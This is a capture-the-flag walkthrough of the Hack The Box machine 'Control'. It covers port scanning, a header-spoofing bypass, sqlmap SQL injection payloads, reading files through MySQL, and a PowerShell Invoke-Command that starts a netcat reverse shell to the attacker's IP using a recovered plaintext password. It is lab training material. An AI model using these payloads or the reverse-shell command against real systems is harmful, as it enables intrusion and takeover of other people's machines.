A quick nmap scan to see which ports are open
nmap -sS -p- -oA nmap_full 10.10.10.167:
1 2 3 4 5 6 7 8 9 10 11
# Nmap 7.80 scan initiated Fri Mar 20 23:53:43 2020 as: nmap -sS -p- -oA nmap_full 10.10.10.167 Nmap scan report for 10.10.10.167 Host is up (0.031s latency). Not shown: 65531 filtered ports PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 3306/tcp open mysql 49666/tcp open unknown
# Nmap done at Fri Mar 20 23:57:58 2020 -- 1 IP address (1 host up) scanned in 254.87 seconds
And a second nmap scan to discover services and versions
nmap -sSVC -p 80,135,3306,49666 10.10.10.167:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Microsoft-IIS/10.0 135/tcp open msrpc Microsoft Windows RPC 3306/tcp open mysql? | fingerprint-strings: | NULL, oracle-tns: |_ Host '10.10.15.52' is not allowed to connect to this MariaDB server 49667/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port3306-TCP:V=7.80%I=7%D=3/20%Time=5E7548B5%P=x86_64-pc-linux-gnu%r(NU SF:LL,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.52'\x20is\x20not\x20allow SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(oracle-tns,4 SF:A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.52'\x20is\x20not\x20allowed\x SF:20to\x20connect\x20to\x20this\x20MariaDB\x20server"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
The SQL server gives us a connection refused so we'll go with the HTTP server.
If we take a look at the source of index.php we can see the following comment:
1 2 3 4 5
<!-- To Do: - Import Products - Link to new payment system - Enable SSL (Certificates location \\192.168.4.28\myfiles) <!-- Header -->
Very interesting comment that will help us in the near future.
Not let's try to reach the admin.php page:
1 2
$ curl http://10.10.10.167/admin.php Access Denied: Header Missing. Please ensure you go through the proxy to access this page
We are denied but we are supposed to go through a proxy, so let's add a
X-Forwarded-For HTTP header and using an internal address we saw the a comment
before 192.168.4.28.
Parameter: productName (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: productName=-7611' OR 8249=8249#
Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: productName=toto' AND (SELECT 1413 FROM(SELECT COUNT(*),CONCAT(0x7178717671,(SELECT (ELT(1413=1413,1))),0x7176786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- dkpS
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: productName=toto' AND (SELECT 7102 FROM (SELECT(SLEEP(5)))ETMY)-- bIbM
Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: productName=toto' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178717671,0x5665716b58786a4955776773767048694661436950414263626c756b56717243616f6d59796b4f66,0x7176786a71),NULL#
In order to avoid time-based queries we can use the --technique BEUS option.
I tried to get a reverse shell with --os-pwn directly but something when wrong
so let's try a more manual approach.
Let's use --sql-shell to be able to run some SQL queries.
1 2 3
$ sqlmap -u http://10.10.10.167/search_products.php --method POST -p productName --data 'productName=toto' -H 'X-Forwarded-For: 192.168.4.28' --dbms mysql --sql-shell
select load_file('C:/WINDOWS/system32/drivers/etc/hosts'): '# Copyright (c) 1993-2009 Microsoft Corp.\r\n#\r\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\r\n#\r\n# This file contains the mappings of IP addresses to host names. Each\r\n# entry should be kept on an individual line. The IP address should\r\n# be placed in the first column followed by the corresponding host name.\r\n# The IP address and the host name should be separated by at least one\r\n# space.\r\n#\r\n# Additionally, comments (such as these) may be inserted on individual\r\n# lines or following the machine name denoted by a '#' symbol.\r\n#\r\n# For example:\r\n#\r\n# 102.54.94.97 rhino.acme.com # source server\r\n# 38.25.63.10 x.acme.com # x client host\r\n\r\n# localhost name resolution is handled within DNS itself.\r\n#\t127.0.0.1 localhost\r\n#\t::1 localhost\r\n'
With select load_file('C:/WINDOWS/system32/drivers/etc/hosts') it try to see
if we can read files and it's working!
$ sqlmap -u http://10.10.10.167/search_products.php --method POST -p productName --data 'productName=toto' -H 'X-Forwarded-For: 192.168.4.28' --dbms mysql --privileges
[17:52:11] [INFO] fetching database users privileges database management system users privileges: [*] 'hector'@'localhost' (administrator) [29]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TABLESPACE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DELETE HISTORY privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE [*] 'manager'@'localhost' [1]: privilege: FILE [*] 'root'@'127.0.0.1' (administrator) [29]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TABLESPACE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DELETE HISTORY privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE
It seems our current user manager is less privileged than root or hector
but still has the FILE perm that allowed use to read
C:/WINDOWS/system32/drivers/etc/hosts.
As I said earlier --os-pwn was not working so I tried --os-shell to run
some command manually.
I generated (locally) a meterpreter reverse shell.
User Name SID ================= ======== nt authority\iusr S-1-5-17
GROUP INFORMATION -----------------
Group Name Type SID Attributes ==================================== ================ ============ ================================================== Mandatory Label\High Mandatory Level Label S-1-16-12288 Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\SERVICE Well-known group S-1-5-6 Group used for deny only CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION ----------------------
Privilege Name Description State ======================= ========================================= ======= SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled
# create a credential object $pass = ConvertTo-SecureString'l33th4x0rhector'-AsPlainText-Force $cred = New-Object System.Management.Automation.PSCredential('CONTROL\Hector', $pass) # check if credentials are working executing Invoke-Command-Computer Fidelity -ScriptBlock { whoami } -Credential$cred # Now the real command Invoke-Command-Computer Fidelity -Credential$cred-ScriptBlock { cmd /c "C:\inetpub\wwwroot\uploads\nc.exe -e powershell 10.10.15.123 10000" }
I lost hours at this step. Why?
Because of troll from the challenge author.
The Invoke-Command command requires the right hostname to work even if it is
localhost else it fails with an obscure error.
When you get the hostname of the machine in a classic way, or with enumeration
tool or if you guess that the name of the HTB box, you will think that the
hostname is CONTROL right?
1 2 3 4 5 6 7 8
PS C:\inetpub\wwwroot> gc env:computername CONTROL
PS C:\inetpub\wwwroot> $env:computername CONTROL
c:\>echo %computername% CONTROL
Not at all, I don't understand why but the legacy Hostname.exe returns
Fidelity, same in powershell..